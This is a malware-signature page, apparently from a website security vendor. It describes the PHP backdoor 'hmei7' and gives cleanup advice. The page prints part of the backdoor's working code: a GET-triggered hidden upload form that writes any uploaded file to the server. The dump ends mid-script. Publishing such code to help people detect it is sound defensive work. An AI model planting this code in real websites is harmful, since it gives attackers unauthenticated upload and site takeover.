Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.backdoor.hmei7.001

php.backdoor.hmei7.001

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.

Hmei7 is well known Indonesian defacer (or group) which adds his sign to his hacking tools as well. These are usually backdoors with file uploading feature as well as ability to change the vital site files like index.php or configuration.php. This way, this hacker is able to quickly modify the site look and make the defacement.

Affecting

Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).

Cleanup

Cleanup is done by deleting the malicious file, which can be found in your system by searching for the dump code below inside your files. Reviewing access logs for non-expected HTTP POSTs can point out the possible infected files.
You can also sign up with us and let our team remove the malware for you.

Dump

Part of a malicious script with (reversed) Hmei7 sign:

if ( isset($_GET['indonesia']) )
{
    echo "silahkan masuk\n\n";
    echo '<b>Indonesian people is here..<br><br>'.''.'<br></b>';
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( $_POST['_upl'] == "Upload" ) {
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
        else { echo '<b>Upload Gagal !!!</b><br><br>'; }
    }
exit;
}
if ( isset($_GET['yaiyalah']) )
{
    $tmp=strrev('7iemH yb dekcah');
    $nama='x.txt';